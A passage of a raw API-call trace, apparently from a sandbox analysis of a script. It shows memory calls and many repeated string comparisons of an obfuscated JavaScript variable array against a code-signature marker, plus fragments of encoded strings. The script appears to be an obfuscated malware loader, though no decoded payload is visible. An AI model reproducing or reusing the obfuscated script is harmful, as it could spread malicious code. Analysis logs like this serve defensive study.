Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0090.296] realloc (_Block=0x30dfd0, _Size=0x96d0) returned 0x30dfd0
	[0090.296] ??2@YAPEAX_K@Z () returned 0x19f0b0
	[0090.297] free (_Block=0x30dfd0) 
	[0090.297] ??3@YAXPEAX@Z () returned 0x31921001
	[0090.297] ??3@YAXPEAX@Z () returned 0x31921001
	[0090.297] ??3@YAXPEAX@Z () returned 0x31921001
	[0090.297] ??3@YAXPEAX@Z () returned 0x31921001
	[0090.297] ??3@YAXPEAX@Z () returned 0x31921001
	[0090.297] ??3@YAXPEAX@Z () returned 0x31921001
	[0090.297] CoUninitialize () 
	[0090.297] ??3@YAXPEAX@Z () returned 0x31921001
	[0090.297] CloseHandle (hObject=0x140) returned 1
	[0090.297] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0090.297] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0090.297] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0090.297] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0090.297] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0090.297] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0090.297] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0090.297] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0090.298] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.298] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.298] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0090.298] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0090.298] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.298] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0090.298] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.298] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0090.298] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0090.298] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.298] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0090.298] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0090.298] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0090.298] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0090.298] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0090.298] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.298] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.298] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0090.298] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0090.298] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0090.298] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0090.298] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0090.298] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0090.298] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.298] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0090.298] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0090.298] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0090.298] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.298] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0090.298] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0090.298] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0090.298] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0090.298] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0090.298] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0090.298] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0090.298] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0090.298] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0090.298] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0090.299] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.299] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0090.299] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0090.299] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0090.299] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.299] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0090.299] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0090.299] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0090.299] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0090.299] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0090.299] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0090.299] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.299] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0090.299] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0090.299] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0090.299] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0090.299] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0090.299] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0090.299] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0090.299] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0090.299] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0090.299] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0090.299] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0090.299] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.299] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0090.299] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0090.299] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0090.299] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0090.299] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.299] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0090.299] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0090.299] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0090.299] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0090.299] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0090.299] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0090.299] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.299] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0090.299] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0090.299] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0090.299] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0090.300] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0090.300] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0090.300] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0090.300] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0090.300] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.300] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0090.300] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0090.300] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0090.300] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0090.300] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0090.300] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0090.300] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0090.300] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0090.300] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0090.300] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0090.300] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.300] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0090.300] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0090.300] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0090.300] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0090.300] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0090.300] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0090.300] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.300] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.300] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0090.300] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0090.300] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0090.300] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0090.300] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0090.300] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0090.300] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0090.300] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0090.300] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0090.300] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0090.300] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.300] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0090.300] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0090.300] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0090.300] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0090.300] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0090.301] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0090.301] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0090.301] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0090.301] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.301] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0090.301] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0090.301] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0090.301] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.301] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0090.301] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0090.301] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0090.301] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0090.301] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0090.301] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0090.301] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0090.301] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0090.301] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0090.301] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0090.301] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0090.301] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0090.301] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0090.301] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0090.301] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0090.301] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0090.301] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0090.301] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0090.301] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0090.301] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0090.301] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0090.301] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0090.301] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0090.301] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0090.301] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0090.301] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0090.301] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0090.301] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
